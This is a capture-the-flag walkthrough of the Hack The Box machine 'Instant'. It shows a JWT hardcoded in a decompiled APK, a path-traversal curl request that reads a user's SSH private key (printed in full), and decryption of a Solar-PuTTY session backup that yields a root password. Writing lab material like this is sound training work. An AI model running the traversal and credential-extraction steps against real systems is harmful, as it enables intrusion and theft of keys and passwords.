Home

Instant – Hack The Box – @lautarovculic

, , , , , , ,

Instant

User.txt

Let’s discover open ports with nmap

				
					sudo nmap -p- -Pn -T4 --min-rate 5000 -sSCV 10.10.11.37

Output:

				
					PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 31:83:eb:9f:15:f8:40:a5:04:9c:cb:3f:f6:ec:49:76 (ECDSA)
|_  256 6f:66:03:47:0e:8a:e0:03:97:67:5b:41:cf:e2:c7:c7 (ED25519)
80/tcp open  http    Apache httpd 2.4.58
|_http-title: Instant Wallet
|_http-server-header: Apache/2.4.58 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Add the hostname to our /etc/hosts file

				
					sudo echo "10.10.11.37 instant.htb" | sudo tee -a /etc/hosts

We can see that here’s a APK file.
Download it with

				
					wget http://instant.htb/downloads/instant.apk

Decompile this with apktool

				
					apktool d instant.apk

And let’s inspect the source code with jadx (GUI version)

We can see in the AdminActivities class an JWT harcoded

				
					eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA

And, also we can found some APIs in the network config. For trusted certificates.

				
					tree ./instant/res/xml

./instant/res/xml
└── network_security_config.xml

Content:

				
					<?xml version="1.0" encoding="utf-8"?>
<network-security-config>
    <domain-config cleartextTrafficPermitted="true">
        <domain includeSubdomains="true">mywalletv1.instant.htb</domain>
        <domain includeSubdomains="true">swagger-ui.instant.htb</domain>
    </domain-config>
</network-security-config>

Add this host to our /etc/hosts file

				
					sudo echo "10.10.11.37 mywalletv1.instant.htb" | sudo tee -a /etc/hosts

And

				
					sudo echo "10.10.11.37 swagger-ui.instant.htb" | sudo tee -a /etc/hosts

Let’s go to swagger-ui.instant.htb
After analyzing the UI, we can see that probably we can get an LFI.
Click in the Authorize button and paste the Authorization key that we has found in the Android application.

And checking for log file, we can look for ../.ssh/id_rsa
Here’s a curl command:

				
					curl --header "Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA" 'http://swagger-ui.instant.htb/api/v1/admin/read/log?log_file_name=../.ssh/id_rsa'

Here’s the id_rsa

				
					-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAzqrq6Sj7LZ3/IFFcoM54887BFhPiTvDHbwrFFSIQq3p8k9uT
0q9GZFyGkbVHiARxp24Y7qZCsN6gq6Ejg4D0EAldqLNJr1W8KoDAXBITlv+8SF3H
2E9GHJEyzVKrA7vjes9ohOB++nfdxjp9bxKyVYCCRdpKsd+A/f+qcs4ZgOoK9/Oy
6oop/Eue+q41ymJwi3wotZQBhPOJA507Eg0NL6hroVA2A9UsoaOPbtGJjFckHyVI
v5mlXPlxEgniysM69CVV49u1RI43E4xEF9bL/uoWzLpG+8v899vGzwKaPdtZEAYZ
jLBrtIRw5XSZ4SU45ucERC7YoKDt73LoR35smQIDAQABAoIBAAzVPSgERPCUtoJl
uvg7SfRturypuGxJdEDXbNx+lIVpYjH2OQwkmRzjR/HlTU9LY1lPs1miVlLQSC7Q
HznruHwEcN3oYCN0ke4bt5YgAzpln+XoeN/cMFDWzU5Fm1vsf1ghZ+6UWB4qckl8
WUyb3xoDFFPNFcVMySA8j3N4i8ne4fsbMI+d8Hlfxa5MCVQlq5Fzi4+PbPdQ0uXt
w1VEFREkofyNth13LjJMXcQ8JgRt8x/Eu2rJ6mMAqsoAKnd3IYNivjCM4jgYXRpK
Bn/ZM5jjUGQtd9Gh0pHkZvg7HGIZVoZlv0SQ/rjMqIRwynJd+lk3rNsFeSZlqPGN
CSruxMcCgYEA8q7Xv6hisVYOivk0uFOip+JMo/5lQJ216N461pDpFiULv4sHykis
hjogrEpHG79d7ny7goBe8c5+gOg5d650XqOKFd+LUWAyy5EEQSTguornJoyyHQ0q
wAq9Om6OiCTwPgAgDK17UeQrBSuYmUGh1QLhaBnd7ON2coVZr5UZOBsCgYEA2gIj
rWGDZ3S/KpXDnjoTT46pxwNNCqWEIX+VNHkgCzhtW6YTaTwxorG0xLiI5zzbCs//
k2KoDd1cuXSE3oFUnjFzjQ85SVCtgEqBKv9PTh8PqNnpRtTkWNfr4q1B/VMoBfk0
G4JvPX68KjPA9aLKBWxvKdHJB+3uSkVUp6KkIVsCgYBwYdFdWs/hSXXQm5jzZx+i
2SQeqXcgFiigXxEmPdMCw0MOf4arAT6Lpi1tO7R0QAlyoGaBB4twNOzWKzQ5nRsc
nGUcvfmZRJAhPtWWiUpceGiUrIDq/Sb36cE5ZuswVtK+E3bECC5cfOoDKe4vwnn7
16qkd54Szj8Sx3gB3GziUwKBgQCeRkdYrR8VkTDo3eozib5TWCPylHbub9RJ7bKJ
chbNjp32l9An6seuco3m9IKQPyJX60KF4m5YAoo7Klj8obCpWQWnN5JDpAsSxQSa
DtmowexAjlRKVG2kAr8Cxv7Nx/2auJ4YCs5wOv6pNQG2VAWPgnYCSohE9Xy29zbK
rc2zWQKBgErwjqLgcKvaNUUwE9yi0DmrqKyZZPDyk8//MDA2ZUjUGh664qqq7ZOY
qUwJoIFjuGC9tZflm3a8G0Y33K80/wP+zGb+wOKuPSqAhzQiyL4bJmS35gqLJpCX
xJKwnrSWHa9GvdREiH9CWoMkGkCPp8wuo1icHboL5m7WmeRAaKio
-----END RSA PRIVATE KEY-----

In the API UI we can run a user list. We can see that if we register as new user, our id is 3.
Then, probably the user for log in via ssh is shirohige

Then

				
					chmod 600 id_rsa
				
			
				
					ssh -i id_rsa shirohige@10.10.11.37

And we can found the user.txt flag

				
					shirohige@instant:~$ cat user.txt
d846f3d**********d378bb
shirohige@instant:~$

Root.txt

We can think that the escalation is via Solar-PuTTY.
I found this directory
/opt/backups/Solar-PuTTY and this file sessions-backup.dat

So, we can try decrypt the session file.
Transfer the file to our machine with

				
					python3 -m http.server 8000

Then, in our machine

				
					wget http://10.10.11.37:8000/sessions-backup.dat

I’ll use this executable
https://github.com/VoidSec/SolarPuttyDecrypt/releases/tag/v1.0
Download the zip and code file.

IMPORTANT
You need make some changes in the project for avoid errors of the path file.

And, in my case I use an Windows 10 with virtualbox for this process.
Transfer the .dat file to windows machine and the tool too.

Here’s the secret key

				
					shirohige@instant:~/projects/mywallet/Instant-Api/mywallet$ ls -la

total 76
drwxr-xr-x 5 shirohige shirohige  4096 Oct  4 15:22 .
drwxr-xr-x 4 shirohige shirohige  4096 Oct  4 15:22 ..
-rw-r--r-- 1 shirohige shirohige    71 Aug  8 19:34 .env
drwxrwxr-x 2 shirohige shirohige  4096 Oct  4 15:22 __pycache__
-rw-r--r-- 1 shirohige shirohige 13255 Oct  2 11:02 app.py
drwxr-xr-x 2 shirohige shirohige  4096 Oct 12 20:10 instance
-rw-r--r-- 1 shirohige shirohige  2231 Jul 21 22:13 models.py
-rw-r--r-- 1 shirohige shirohige   584 Aug  2 15:43 requirements.txt
-rw-r--r-- 1 shirohige shirohige 25488 Oct  4 10:50 serve.py
drwxr-xr-x 2 shirohige shirohige  4096 Oct  4 15:22 swagger_configs
shirohige@instant:~/projects/mywallet/Instant-Api/mywallet$ cat .env
SECRET_KEY=VeryStrongS3cretKeyY0uC4NTGET
LOG_PATH=/home/shirohige/logs/

VeryStrongS3cretKeyY0uC4NTGET
So, we can run in our Windows Machine

				
					SolarPuttyDecrypt.exe sessions-backup.dat VeryStrongS3cretKeyY0uC4NTGET

Output:

				
					-----------------------------------------------------  
SolarPutty's Sessions Decrypter by VoidSec  
-----------------------------------------------------  
{
  "Credentials": [
    {
      "Id": "452ed919-530e-419b-b721-da76cbe8ed04",
      "CredentialsName": "instant-root",
      "Username": "root",
      "Password": "12**24nzC!r0c%q12",
      "PrivateKeyPath": "",
      "Passphrase": "",
      "PrivateKeyContent": null
    }
  ]
}

Then, with su command, login with the password 12**24nzC!r0c%q12

				
					shirohige@instant:~/projects/mywallet/Instant-Api/mywallet$ su
Password:
root@instant:/home/shirohige/projects/mywallet/Instant-Api/mywallet# cat /root/root.txt
ac8b41****************32e09
root@instant:/home/shirohige/projects/mywallet/Instant-Api/mywallet#

And we get the flag.

I hope you found it useful (:

Leave a Reply

Your email address will not be published. Required fields are marked *